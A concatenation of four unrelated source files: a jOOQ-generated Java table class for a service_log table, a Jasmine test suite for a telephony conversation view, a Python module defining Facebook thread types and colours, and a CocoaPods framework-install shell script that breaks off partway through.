import io.cattle.platform.core.model.tables.records.ServiceLogRecord;
import io.cattle.platform.db.jooq.converter.DataConverter;
import io.cattle.platform.db.jooq.converter.DateConverter;
import java.util.Arrays;
import java.util.Date;
import java.util.List;
import java.util.Map;
import javax.annotation.Generated;
import org.jooq.Field;
import org.jooq.ForeignKey;
import org.jooq.Identity;
import org.jooq.Schema;
import org.jooq.Table;
import org.jooq.TableField;
import org.jooq.UniqueKey;
import org.jooq.impl.TableImpl;
/**
* This class is generated by jOOQ.
*/
@Generated(
value = {
"http://www.jooq.org",
"jOOQ version:3.9.3"
},
comments = "This class is generated by jOOQ"
)
@SuppressWarnings({ "all", "unchecked", "rawtypes" })
public class ServiceLogTable extends TableImpl<ServiceLogRecord> {
private static final long serialVersionUID = -710824202;
/**
* The reference instance of <code>cattle.service_log</code>
*/
public static final ServiceLogTable SERVICE_LOG = new ServiceLogTable();
/**
* The class holding records for this type
*/
@Override
public Class<ServiceLogRecord> getRecordType() {
return ServiceLogRecord.class;
}
/**
* The column <code>cattle.service_log.id</code>.
*/
public final TableField<ServiceLogRecord, Long> ID = createField("id", org.jooq.impl.SQLDataType.BIGINT.nullable(false), this, "");
/**
* The column <code>cattle.service_log.account_id</code>.
*/
public final TableField<ServiceLogRecord, Long> ACCOUNT_ID = createField("account_id", org.jooq.impl.SQLDataType.BIGINT, this, "");
/**
* The column <code>cattle.service_log.kind</code>.
*/
public final TableField<ServiceLogRecord, String> KIND = createField("kind", org.jooq.impl.SQLDataType.VARCHAR.length(255).nullable(false), this, "");
/**
* The column <code>cattle.service_log.description</code>.
*/
public final TableField<ServiceLogRecord, String> DESCRIPTION = createField("description", org.jooq.impl.SQLDataType.VARCHAR.length(1024), this, "");
/**
* The column <code>cattle.service_log.created</code>.
*/
public final TableField<ServiceLogRecord, Date> CREATED = createField("created", org.jooq.impl.SQLDataType.TIMESTAMP, this, "", new DateConverter());
/**
* The column <code>cattle.service_log.data</code>.
*/
public final TableField<ServiceLogRecord, Map<String,Object>> DATA = createField("data", org.jooq.impl.SQLDataType.CLOB, this, "", new DataConverter());
/**
* The column <code>cattle.service_log.end_time</code>.
*/
public final TableField<ServiceLogRecord, Date> END_TIME = createField("end_time", org.jooq.impl.SQLDataType.TIMESTAMP, this, "", new DateConverter());
/**
* The column <code>cattle.service_log.event_type</code>.
*/
public final TableField<ServiceLogRecord, String> EVENT_TYPE = createField("event_type", org.jooq.impl.SQLDataType.VARCHAR.length(255), this, "");
/**
* The column <code>cattle.service_log.service_id</code>.
*/
public final TableField<ServiceLogRecord, Long> SERVICE_ID = createField("service_id", org.jooq.impl.SQLDataType.BIGINT, this, "");
/**
* The column <code>cattle.service_log.instance_id</code>.
*/
public final TableField<ServiceLogRecord, Long> INSTANCE_ID = createField("instance_id", org.jooq.impl.SQLDataType.BIGINT, this, "");
/**
* The column <code>cattle.service_log.transaction_id</code>.
*/
public final TableField<ServiceLogRecord, String> TRANSACTION_ID = createField("transaction_id", org.jooq.impl.SQLDataType.VARCHAR.length(255), this, "");
/**
* The column <code>cattle.service_log.sub_log</code>.
*/
public final TableField<ServiceLogRecord, Boolean> SUB_LOG = createField("sub_log", org.jooq.impl.SQLDataType.BIT.nullable(false).defaultValue(org.jooq.impl.DSL.inline("b'0'", org.jooq.impl.SQLDataType.BIT)), this, "");
/**
* The column <code>cattle.service_log.level</code>.
*/
public final TableField<ServiceLogRecord, String> LEVEL = createField("level", org.jooq.impl.SQLDataType.VARCHAR.length(255), this, "");
/**
* The column <code>cattle.service_log.deployment_unit_id</code>.
*/
public final TableField<ServiceLogRecord, Long> DEPLOYMENT_UNIT_ID = createField("deployment_unit_id", org.jooq.impl.SQLDataType.BIGINT, this, "");
/**
* Create a <code>cattle.service_log</code> table reference
*/
public ServiceLogTable() {
this("service_log", null);
}
/**
* Create an aliased <code>cattle.service_log</code> table reference
*/
public ServiceLogTable(String alias) {
this(alias, SERVICE_LOG);
}
private ServiceLogTable(String alias, Table<ServiceLogRecord> aliased) {
this(alias, aliased, null);
}
private ServiceLogTable(String alias, Table<ServiceLogRecord> aliased, Field<?>[] parameters) {
super(alias, null, aliased, parameters, "");
}
/**
* {@inheritDoc}
*/
@Override
public Schema getSchema() {
return CattleTable.CATTLE;
}
/**
* {@inheritDoc}
*/
@Override
public Identity<ServiceLogRecord, Long> getIdentity() {
return Keys.IDENTITY_SERVICE_LOG;
}
/**
* {@inheritDoc}
*/
@Override
public UniqueKey<ServiceLogRecord> getPrimaryKey() {
return Keys.KEY_SERVICE_LOG_PRIMARY;
}
/**
* {@inheritDoc}
*/
@Override
public List<UniqueKey<ServiceLogRecord>> getKeys() {
return Arrays.<UniqueKey<ServiceLogRecord>>asList(Keys.KEY_SERVICE_LOG_PRIMARY);
}
/**
* {@inheritDoc}
*/
@Override
public List<ForeignKey<ServiceLogRecord, ?>> getReferences() {
return Arrays.<ForeignKey<ServiceLogRecord, ?>>asList(Keys.FK_SERVICE_LOG__ACCOUNT_ID, Keys.FK_SERVICE_LOG__SERVICE_ID, Keys.FK_SERVICE_LOG__INSTANCE_ID, Keys.FK_SERVICE_LOG__DEPLOYMENT_UNIT_ID);
}
/**
* {@inheritDoc}
*/
@Override
public ServiceLogTable as(String alias) {
return new ServiceLogTable(alias, this);
}
/**
* Rename this table
*/
@Override
public ServiceLogTable rename(String name) {
return new ServiceLogTable(name, null);
}
}
|
<filename>spec/javascripts/telephony/views/conversation_view_spec.js
describe("Zest.Telephony.Views.ConversationView", function() {
describe("#render", function() {
var view;
beforeEach(function() {
setFixtures('<div id="conversation-wrapper"></div>');
view = new Zest.Telephony.Views.ConversationView({el: $("#conversation-wrapper")});
view.render();
});
it("displays conversation controls", function() {
expect(view.el).toContain("input[name=number]");
expect(view.el).toContain("button.initiate-conversation");
});
it("does not display a conversation message", function() {
expect(view.$('.friendly-message')).toHaveText("");
});
});
describe('event handling', function() {
describe("receiving an outbound telephony:Connect event", function() {
var view;
beforeEach(function() {
setFixtures('<div id="conversation-wrapper"></div>');
view = new Zest.Telephony.Views.ConversationView({el: $("#conversation-wrapper")});
view.render();
view.conversation.set({state: 'connecting'});
var data = {
conversation_id: 10,
conversation_state: "connecting",
call_id: 20,
number: "1111111111"
};
$(document).trigger('telephony:Connect', data);
});
it("displays a ringing message", function() {
expect(view.el).toHaveText(/Ringing/);
});
it("displays the phone number", function() {
expect(view.$("[name='number']")).toHaveValue("1111111111");
});
});
describe("receiving a telephony:InitializeWidget event", function () {
var view;
beforeEach(function () {
setFixtures('<div id="conversation-wrapper"></div>');
view = new Zest.Telephony.Views.ConversationView({el: $("#conversation-wrapper")});
view.render();
view.friendlyMessage = "Call Ended";
$(document).trigger('telephony:InitializeWidget');
});
it("clears the friendly message", function () {
expect(view.$(".friendly-message")).toHaveText("");
});
});
describe("receiving an inbound telephony:Connect event", function () {
var view;
beforeEach(function () {
setFixtures('<div id="conversation-wrapper"></div>');
view = new Zest.Telephony.Views.ConversationView({el: $("#conversation-wrapper")});
view.render();
var data = {
conversation_id: 10,
conversation_state: "connecting",
number: "1111111111",
call_id: 20
};
$(document).trigger('telephony:Connect', data);
});
it("displays the inbound number", function () {
expect(view.$("[name='number']")).toHaveValue("1111111111");
});
});
describe("receiving a telephony:Start event", function() {
var view;
beforeEach(function() {
setFixtures('<div id="conversation-wrapper"></div>');
view = new Zest.Telephony.Views.ConversationView({el: $("#conversation-wrapper")});
view.render();
var data = {
conversation_id: 10,
conversation_state: "connecting",
call_id: 20,
number: "1111111111"
};
$(document).trigger('telephony:Start', data);
});
it("displays a connected message", function() {
expect(view.el).toHaveText(/Connected/);
});
it("displays the phone number", function() {
expect(view.$("[name='number']")).toHaveValue("1111111111");
});
});
describe("receiving a telephony:Terminate event", function() {
var view;
beforeEach(function() {
setFixtures('<div id="conversation-wrapper"></div>');
view = new Zest.Telephony.Views.ConversationView({el: $("#conversation-wrapper")});
view.conversation.set({ state: 'on_a_call',
isCancelable: true });
view.render();
var data = {
conversation_id: 10
};
runs(function() {
view.friendlyMessageFadeOutTime = 100;
$(document).trigger('telephony:Terminate', data);
});
waitsFor(function() {
return view.$('.friendly-message').css('opacity') < 1;
}, "didn't fade out the call ended message");
});
it("fades outs a call ended message", function() {
runs(function() {
expect(view.el).toHaveText(/Call Ended/);
});
});
it('re-displays the call button', function() {
runs(function() {
expect(view.$('.initiate-conversation')).not.toHaveClass('hidden');
});
});
it("does not display the phone number", function() {
runs(function() {
expect(view.$("[name='number']")).toHaveValue("");
});
});
it("does not display the cancel transfer button", function() {
runs(function() {
expect(view.$('.cancel-transfer')).toHaveClass('hidden');
});
});
});
describe("receiving a telephony:InitiateOneStepTransfer event", function() {
var view;
beforeEach(function() {
setFixtures('<div id="conversation-wrapper"></div>');
view = new Zest.Telephony.Views.ConversationView({el: $("#conversation-wrapper")});
view.render();
});
describe("for agent 1", function() {
beforeEach(function() {
var data = {
transferrer: true,
agent_name: "<NAME>",
agent_ext: 10,
agent_type: 'A',
number: "1111111111"
};
$(view.el).text('Connected');
$(document).trigger('telephony:InitiateOneStepTransfer', data);
});
it("does not display a one step transfer initiated message", function() {
expect(view.el).toHaveText(/Connected/);
});
});
describe("for agent 2", function() {
beforeEach(function() {
var data = {
transferrer: false,
agent_name: "<NAME>",
agent_ext: 11,
agent_type: 'A',
number: "1111111112"
};
$(document).trigger('telephony:InitiateOneStepTransfer', data);
});
it("displays a one step transfer initiated message", function() {
expect(view.el).toHaveText(/1-step transfer from A - Another Name x11/);
});
it("displays the phone number", function() {
expect(view.$("[name='number']")).toHaveValue("1111111112");
});
});
});
describe("receiving a telephony:CompleteOneStepTransfer event", function() {
var view;
beforeEach(function() {
setFixtures('<div id="conversation-wrapper"></div>');
view = new Zest.Telephony.Views.ConversationView({el: $("#conversation-wrapper")});
view.render();
var data = {
agent_name: "<NAME>",
agent_ext: 10,
agent_type: 'A',
number: "1111111111"
};
$(document).trigger('telephony:CompleteOneStepTransfer', data);
});
it("displays a one step transfer completed message", function() {
expect(view.el).toHaveText(/Connected/);
});
it("displays the phone number", function() {
expect(view.$("[name='number']")).toHaveValue("1111111111");
});
});
describe("receiving a telephony:FailOneStepTransfer event", function() {
var view;
beforeEach(function() {
setFixtures('<div id="conversation-wrapper"></div>');
view = new Zest.Telephony.Views.ConversationView({el: $("#conversation-wrapper")});
view.render();
});
describe('for agent1', function() {
beforeEach(function() {
var data = {
transferrer: true,
agent_name: "<NAME>",
agent_ext: 10,
agent_type: 'A',
number: "1111111111"
};
$(document).trigger('telephony:FailOneStepTransfer', data);
});
it("does not display a one step transfer failed message", function() {
expect(view.el).not.toHaveText(/Missed 1-step transfer/);
});
it('terminates its conversation', function() {
expect(view.conversation.get('state')).toEqual('terminated');
});
});
describe('for agent2', function() {
beforeEach(function() {
var data = {
transferrer: false,
agent_name: "<NAME>",
agent_ext: 10,
agent_type: 'A',
number: "1111111111"
};
$(document).trigger('telephony:FailOneStepTransfer', data);
});
it("displays a one step transfer failed message", function() {
expect(view.el).toHaveText(/Missed 1-step transfer from A - Some Name x10/);
});
it('terminates its conversation', function() {
expect(view.conversation.get('state')).toEqual('terminated');
});
});
});
describe("receiving a telephony:InitiateTwoStepTransfer event", function() {
var view;
beforeEach(function() {
setFixtures('<div id="conversation-wrapper"></div>');
view = new Zest.Telephony.Views.ConversationView({el: $("#conversation-wrapper")});
view.render();
});
describe("for the initiator of the transfer", function() {
beforeEach(function() {
var data = {
transferrer: true,
agent_name: "<NAME>",
agent_ext: 10,
agent_type: 'A',
number: "1111111111"
};
$(document).trigger('telephony:InitiateTwoStepTransfer', data);
});
it("displays a two step transfer initiated message", function() {
expect(view.el).toHaveText(/Ringing A - Some Name x10/);
});
it("displays the phone number", function() {
expect(view.$("[name='number']")).toHaveValue("1111111111");
});
});
describe("for the recipient of the transfer", function() {
beforeEach(function() {
var data = {
transferrer: false,
agent_name: "<NAME>",
agent_ext: 10,
agent_type: 'A',
number: "1111111111"
};
$(document).trigger('telephony:InitiateTwoStepTransfer', data);
});
it("displays a two step transfer initiated message", function() {
expect(view.el).toHaveText(/2-step transfer from A - Some Name x10/);
});
it("displays the phone number", function() {
expect(view.$("[name='number']")).toHaveValue("1111111111");
});
});
});
describe("receiving a telephony:FailTwoStepTransfer event", function() {
var view;
beforeEach(function() {
setFixtures('<div id="conversation-wrapper"></div>');
view = new Zest.Telephony.Views.ConversationView({el: $("#conversation-wrapper")});
view.render();
});
describe('for agent1', function() {
beforeEach(function() {
var data = {
transferrer: true,
agent_name: "Agent 2",
agent_ext: 10,
number: "1111111111"
};
runs(function() {
view.friendlyMessageFadeOutTime = 100;
$(document).trigger('telephony:FailTwoStepTransfer', data);
});
waitsFor(function() {
return view.$('.friendly-message').css('opacity') < 1;
}, "didn't fade out the two step transfer failed message", 1000);
});
it("displays a two step transfer failed message", function() {
expect(view.$('.friendly-message')).toHaveText("No Answer - Agent 2 x10");
});
it("displays agent2's phone number", function() {
runs(function() {
expect(view.$("[name='number']")).toHaveValue("1111111111");
});
});
});
describe('for agent2', function() {
beforeEach(function() {
var data = {
transferrer: false,
agent_name: "<NAME>",
agent_ext: 11,
agent_type: 'B',
number: "1111111111"
};
$(document).trigger('telephony:FailTwoStepTransfer', data);
});
it("displays a two step transfer failed message", function() {
expect(view.el).toHaveText(/Missed 2-step transfer from B - Other Name x11/);
});
});
});
describe("receiving a telephony:CompleteTwoStepTransfer event", function() {
var view;
beforeEach(function() {
setFixtures('<div id="conversation-wrapper"></div>');
view = new Zest.Telephony.Views.ConversationView({el: $("#conversation-wrapper")});
view.render();
var data = {
agent_name: "<NAME>",
agent_ext: 10,
agent_type: 'A',
number: "1111111111"
};
$(document).trigger('telephony:CompleteTwoStepTransfer', data);
});
it("displays a two step transfer completed message", function() {
expect(view.el).toHaveText(/Connected to A - Some Name x10/);
});
it("displays the phone number", function() {
expect(view.$("[name='number']")).toHaveValue("1111111111");
});
});
describe("receiving a telephony:LeaveTwoStepTransfer event", function() {
var view;
beforeEach(function() {
setFixtures('<div id="conversation-wrapper"></div>');
view = new Zest.Telephony.Views.ConversationView({el: $("#conversation-wrapper")});
view.render();
var data = {
number: "1111111111"
};
$(document).trigger('telephony:LeaveTwoStepTransfer', data);
});
it("displays a leave two step transfer message", function() {
expect(view.el).toHaveText(/Connected/);
});
it("displays the phone number", function() {
expect(view.$("[name='number']")).toHaveValue("1111111111");
});
});
describe("receiving a telephony:CustomerLeftTwoStepTransfer event", function() {
var view;
beforeEach(function() {
setFixtures('<div id="conversation-wrapper"></div>');
view = new Zest.Telephony.Views.ConversationView({el: $("#conversation-wrapper")});
view.render();
var data = {
agent_name: "<NAME>",
agent_ext: 10,
agent_type: 'A',
number: "1111111111"
};
$(document).trigger('telephony:CustomerLeftTwoStepTransfer', data);
});
it("displays a customer left two step transfer message", function() {
expect(view.el).toHaveText(/Connected to A - Some Name x10/);
});
it("displays the phone number", function() {
expect(view.$("[name='number']")).toHaveValue("1111111111");
});
});
describe("receiving a telephony:ClickToCall event", function() {
var view;
beforeEach(function() {
setFixtures('<div id="conversation-wrapper"></div>');
view = new Zest.Telephony.Views.ConversationView({el: $("#conversation-wrapper")});
view.render();
var data = {
loan_id: '1',
to: '3003004002',
to_id: '9',
to_type: 'borrower',
callee_name: '<NAME>'
};
$(document).trigger('telephony:ClickToCall', data);
});
it("displays the callee name", function() {
expect(view.el).toHaveText(/Some Name/);
});
it("updates the conversation", function() {
var convo = view.conversation;
expect(convo.get('to')).toBe('3003004002');
expect(convo.get('toId')).toBe('9');
expect(convo.get('toType')).toBe('borrower');
});
it("displays the phone number", function() {
expect(view.$("[name='number']")).toHaveValue("3003004002");
});
});
describe('receiving a transferFailed event from its TransferView subview', function() {
var view;
beforeEach(function() {
setFixtures('<div id="conversation-wrapper"></div>');
view = new Zest.Telephony.Views.ConversationView();
view.render();
$(document).trigger('transferFailed', 'Agent is unavailable');
});
it('displays a transfer failed message', function() {
expect(view.$('.friendly-message')).toHaveText('Agent is unavailable');
});
});
});
describe("submitting a conversation", function() {
var view;
beforeEach(function() {
setFixtures('<div id="conversation-wrapper" />');
view = new Zest.Telephony.Views.ConversationView({loanId: 123});
view.conversation.set({ state: 'not_initiated' });
view.render();
jasmine.Ajax.useMock();
});
describe('with a valid phone number', function() {
beforeEach(function() {
view.$('input[name=number]').val("300-300-4000");
});
it("creates a new conversation", function() {
view.$('button.initiate-conversation').click();
var request = mostRecentAjaxRequest();
expect(request.url).toBe('/zestphone/conversations');
expect(request.method).toBe('POST');
expect(request.params).toMatch('loan_id=123');
});
it("disables the phone number input", function() {
view.$('button.initiate-conversation').click();
expect(view.$('input[name=number]')).toBeDisabled();
expect(view.$('input[name=number]')).toHaveValue('300-300-4000');
});
it("disables the call button", function() {
view.$('button.initiate-conversation').click();
expect(view.$('button.initiate-conversation')).toBeDisabled();
});
});
describe('with an invalid phone number', function() {
beforeEach(function() {
view.conversation.set({state: "not_initiated"});
view.$('input[name=number]').val('');
view.$('button.initiate-conversation').click();
});
it('displays an error message', function() {
expect(view.$('.friendly-message')).toHaveText(/Please enter a 10-digit phone number/);
});
});
});
describe("submitting a conversation without a page reload", function() {
var view;
beforeEach(function() {
setFixtures('<div class="conversation-wrapper" />');
view = new Zest.Telephony.Views.ConversationView();
view.render();
view.$('input[name=number]').val("3003004000");
jasmine.Ajax.useMock();
});
it("creates a new conversation every time", function() {
var data = '{"id":110,"caller_call_id":238,"callee_call_id":239}';
// First call
view.$('button.initiate-conversation').click();
firstCallRequest = mostRecentAjaxRequest();
firstCallRequest.response({ status:200, responseText:data });
expect(firstCallRequest.url).toBe('/zestphone/conversations');
// Enable calling
view.conversation.set({state: 'terminated'});
// Second call
view.$('button.initiate-conversation').click();
secondCallRequest = mostRecentAjaxRequest();
expect(secondCallRequest.url).toBe('/zestphone/conversations');
});
});
describe("#disableCallControl", function() {
var view;
beforeEach(function() {
setFixtures('<div id="conversation-wrapper" />');
view = new Zest.Telephony.Views.ConversationView();
view.render();
var data = { callingDisabled: true };
view.disableCallControl(data);
});
it("disables the initiate conversation button", function() {
expect(view.$('button.initiate-conversation')).toBeDisabled();
});
});
});
|
import attr
from ._core import Enum
class ThreadType(Enum):
"""Used to specify what type of Facebook thread is being used.
See :ref:`intro_threads` for more info.
"""
USER = 1
GROUP = 2
ROOM = 2
PAGE = 3
def _to_class(self):
"""Convert this enum value to the corresponding class."""
from . import _user, _group, _page
return {
ThreadType.USER: _user.User,
ThreadType.GROUP: _group.Group,
ThreadType.ROOM: _group.Room,
ThreadType.PAGE: _page.Page,
}[self]
class ThreadLocation(Enum):
"""Used to specify where a thread is located (inbox, pending, archived, other)."""
INBOX = "INBOX"
PENDING = "PENDING"
ARCHIVED = "ARCHIVED"
OTHER = "OTHER"
class ThreadColor(Enum):
"""Used to specify a thread colors."""
MESSENGER_BLUE = "#0084ff"
VIKING = "#44bec7"
GOLDEN_POPPY = "#ffc300"
RADICAL_RED = "#fa3c4c"
SHOCKING = "#d696bb"
PICTON_BLUE = "#6699cc"
FREE_SPEECH_GREEN = "#13cf13"
PUMPKIN = "#ff7e29"
LIGHT_CORAL = "#e68585"
MEDIUM_SLATE_BLUE = "#7646ff"
DEEP_SKY_BLUE = "#20cef5"
FERN = "#67b868"
CAMEO = "#d4a88c"
BRILLIANT_ROSE = "#ff5ca1"
BILOBA_FLOWER = "#a695c7"
TICKLE_ME_PINK = "#ff7ca8"
MALACHITE = "#1adb5b"
RUBY = "#f01d6a"
DARK_TANGERINE = "#ff9c19"
BRIGHT_TURQUOISE = "#0edcde"
@classmethod
def _from_graphql(cls, color):
if color is None:
return None
if not color:
return cls.MESSENGER_BLUE
color = color[2:] # Strip the alpha value
value = "#{}".format(color.lower())
return cls._extend_if_invalid(value)
@attr.s(cmp=False, init=False)
class Thread:
"""Represents a Facebook thread."""
#: The unique identifier of the thread. Can be used a ``thread_id``. See :ref:`intro_threads` for more info
uid = attr.ib(converter=str)
#: Specifies the type of thread. Can be used a ``thread_type``. See :ref:`intro_threads` for more info
type = attr.ib()
#: A URL to the thread's picture
photo = attr.ib(None)
#: The name of the thread
name = attr.ib(None)
#: Timestamp of last message
last_message_timestamp = attr.ib(None)
#: Number of messages in the thread
message_count = attr.ib(None)
#: Set :class:`Plan`
plan = attr.ib(None)
def __init__(
self,
_type,
uid,
photo=None,
name=None,
last_message_timestamp=None,
message_count=None,
plan=None,
):
self.uid = str(uid)
self.type = _type
self.photo = photo
self.name = name
self.last_message_timestamp = last_message_timestamp
self.message_count = message_count
self.plan = plan
@staticmethod
def _parse_customization_info(data):
if data is None or data.get("customization_info") is None:
return {}
info = data["customization_info"]
rtn = {
"emoji": info.get("emoji"),
"color": ThreadColor._from_graphql(info.get("outgoing_bubble_color")),
}
if (
data.get("thread_type") == "GROUP"
or data.get("is_group_thread")
or data.get("thread_key", {}).get("thread_fbid")
):
rtn["nicknames"] = {}
for k in info.get("participant_customizations", []):
rtn["nicknames"][k["participant_id"]] = k.get("nickname")
elif info.get("participant_customizations"):
uid = data.get("thread_key", {}).get("other_user_id") or data.get("id")
pc = info["participant_customizations"]
if len(pc) > 0:
if pc[0].get("participant_id") == uid:
rtn["nickname"] = pc[0].get("nickname")
else:
rtn["own_nickname"] = pc[0].get("nickname")
if len(pc) > 1:
if pc[1].get("participant_id") == uid:
rtn["nickname"] = pc[1].get("nickname")
else:
rtn["own_nickname"] = pc[1].get("nickname")
return rtn
def _to_send_data(self):
# TODO: Only implement this in subclasses
return {"other_user_fbid": self.uid}
|
#!/bin/sh
set -e
set -u
set -o pipefail
if [ -z ${FRAMEWORKS_FOLDER_PATH+x} ]; then
# If FRAMEWORKS_FOLDER_PATH is not set, then there's nowhere for us to copy
# frameworks to, so exit 0 (signalling the script phase was successful).
exit 0
fi
echo "mkdir -p ${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
mkdir -p "${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
COCOAPODS_PARALLEL_CODE_SIGN="${COCOAPODS_PARALLEL_CODE_SIGN:-false}"
SWIFT_STDLIB_PATH="${DT_TOOLCHAIN_DIR}/usr/lib/swift/${PLATFORM_NAME}"
# Used as a return value for each invocation of `strip_invalid_archs` function.
STRIP_BINARY_RETVAL=0
# This protects against multiple targets copying the same framework dependency at the same time. The solution
# was originally proposed here: https://lists.samba.org/archive/rsync/2008-February/020158.html
RSYNC_PROTECT_TMP_FILES=(--filter "P .*.??????")
# Copies and strips a vendored framework
install_framework()
{
if [ -r "${BUILT_PRODUCTS_DIR}/$1" ]; then
local source="${BUILT_PRODUCTS_DIR}/$1"
elif [ -r "${BUILT_PRODUCTS_DIR}/$(basename "$1")" ]; then
local source="${BUILT_PRODUCTS_DIR}/$(basename "$1")"
elif [ -r "$1" ]; then
local source="$1"
fi
local destination="${TARGET_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
if [ -L "${source}" ]; then
echo "Symlinked..."
source="$(readlink "${source}")"
fi
# Use filter instead of exclude so missing patterns don't throw errors.
echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${source}\" \"${destination}\""
rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${source}" "${destination}"
local basename
basename="$(basename -s .framework "$1")"
binary="${destination}/${basename}.framework/${basename}"
if ! [ -r "$binary" ]; then
binary="${destination}/${basename}"
fi
# Strip invalid architectures so "fat" simulator / device frameworks work on device
if [[ "$(file "$binary")" == *"dynamically linked shared library"* ]]; then
strip_invalid_archs "$binary"
fi
# Resign the code if required by the build settings to avoid unstable apps
code_sign_if_enabled "${destination}/$(basename "$1")"
# Embed linked Swift runtime libraries. No longer necessary as of Xcode 7.
if [ "${XCODE_VERSION_MAJOR}" -lt 7 ]; then
local swift_runtime_libs
swift_runtime_libs=$(xcrun otool -LX "$binary" | grep --color=never @rpath/libswift | sed -E s/@rpath\\/\(.+dylib\).*/\\1/g | uniq -u && exit ${PIPESTATUS[0]})
for lib in $swift_runtime_libs; do
echo "rsync -auv \"${SWIFT_STDLIB_PATH}/${lib}\" \"${destination}\""
rsync -auv "${SWIFT_STDLIB_PATH}/${lib}" "${destination}"
code_sign_if_enabled "${destination}/${lib}"
done
fi
}
# Copies and strips a vendored dSYM
install_dsym() {
local source="$1"
if [ -r "$source" ]; then
# Copy the dSYM into a the targets temp dir.
echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${source}\" \"${DERIVED_FILES_DIR}\""
rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${source}" "${DERIVED_FILES_DIR}"
local basename
basename="$(basename -s .framework.dSYM "$source")"
binary="${DERIVED_FILES_DIR}/${basename}.framework.dSYM/Contents/Resources/DWARF/${basename}"
# Strip invalid architectures so "fat" simulator / device frameworks work on device
if [[ "$(file "$binary")" == *"Mach-O dSYM companion"* ]]; then
strip_invalid_archs "$binary"
fi
if [[ $STRIP_BINARY_RETVAL == 1 ]]; then
# Move the stripped file into its final destination.
echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${DERIVED_FILES_DIR}/${basename}.framework.dSYM\" \"${DWARF_DSYM_FOLDER_PATH}\""
rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${DERIVED_FILES_DIR}/${basename}.framework.dSYM" "${DWARF_DSYM_FOLDER_PATH}"
else
# The dSYM was not stripped at all, in this case touch a fake folder so the input/output paths from Xcode do not reexecute this script because the file is missing.
touch "${DWARF_DSYM_FOLDER_PATH}/${basename}.framework.dSYM"
fi
fi
}
# Signs a framework with the provided identity
code_sign_if_enabled() {
if [ -n "${EXPANDED_CODE_SIGN_IDENTITY}" -a "${CODE_SIGNING_REQUIRED:-}" != "NO" -a "${CODE_SIGNING_ALLOWED}" != "NO" ]; then
# Use the current code_sign_identitiy
echo "Code Signing $1 with Identity ${EXPANDED_CODE_SIGN_IDENTITY_NAME}"
local code_sign_cmd="/usr/bin/codesign --force --sign ${EXPANDED_CODE_SIGN_IDENTITY} ${OTHER_CODE_SIGN_FLAGS:-} --preserve-metadata=identifier,entitlements '$1'"
if [ "${COCOAPODS_PARALLEL_CODE_SIGN}" == "true" ]; then
code_sign_cmd="$code_sign_cmd &"
fi
echo "$code_sign_cmd"
eval "$code_sign_cmd"
fi
}
# Strip invalid architectures
strip_invalid_archs() {
binary="$1"
# Get architectures for current target binary
binary_archs="$(lipo -info "$binary" | rev | cut -d ':' -f1 | awk '{$1=$1;print}' | rev)"
# Intersect them with the architectures we are building for
intersected_archs="$(echo ${ARCHS[@]} ${binary_archs[@]} | tr ' ' '\n' | sort | uniq -d)"
# If there are no archs supported by this binary then warn the user
if [[ -z "$intersected_archs" ]]; then
echo "warning: [CP] Vendored binary '$binary' contains architectures ($binary_archs) none of which match the current build architectures ($ARCHS)."
STRIP_BINARY_RETVAL=0
return
fi
stripped=""
for arch in $binary_archs; do
if ! [[ "${ARCHS}" == *"$arch"* ]]; then
# Strip non-valid architectures in-place
lipo -remove "$arch" -output "$binary" "$binary" || exit 1
stripped="$stripped $arch"
fi
done
if [[ "$stripped" ]]; then
echo "Stripped $binary of architectures:$stripped"
fi
STRIP_BINARY_RETVAL=1
}
if [[ "$CONFIGURATION" == "Debug" ]]; then
install_framework "${BUILT_PRODUCTS_DIR}/BoringSSL/openssl.framework"
install_framework "${BUILT_PRODUCTS_DIR}/GoogleToolboxForMac/GoogleToolboxForMac.framework"
install_framework "${BUILT_PRODUCTS_DIR}/MDFInternationalization/MDFInternationalization.framework"
install_framework "${BUILT_PRODUCTS_DIR}/MDFTextAccessibility/MDFTextAccessibility.framework"
install_framework "${BUILT_PRODUCTS_DIR}/MaterialComponents/MaterialComponents.framework"
install_framework "${BUILT_PRODUCTS_DIR}/MotionAnimator/MotionAnimator.framework"
install_framework "${BUILT_PRODUCTS_DIR}/MotionInterchange/MotionInterchange.framework"
install_framework "${BUILT_PRODUCTS_DIR}/MotionTransitioning/MotionTransitioning.framework"
install_framework "${BUILT_PRODUCTS_DIR}/Protobuf/Protobuf.framework"
install_framework "${BUILT_PRODUCTS_DIR}/gRPC/GRPCClient.framework"
install_framework "${BUILT_PRODUCTS_DIR}/gRPC-Core/grpc.framework"
install_framework "${BUILT_PRODUCTS_DIR}/gRPC-ProtoRPC/ProtoRPC.framework"
install_framework "${BUILT_PRODUCTS_DIR}/gRPC-RxLibrary/RxLibrary.framework"
install_framework "${BUILT_PRODUCTS_DIR}/leveldb-library/leveldb.framework"
install_framework "${BUILT_PRODUCTS_DIR}/nanopb/nanopb.framework"
fi
if [[ "$CONFIGURATION" == "Release" ]]; then
install_framework "${BUILT_PRODUCTS_DIR}/BoringSSL/openssl.framework"
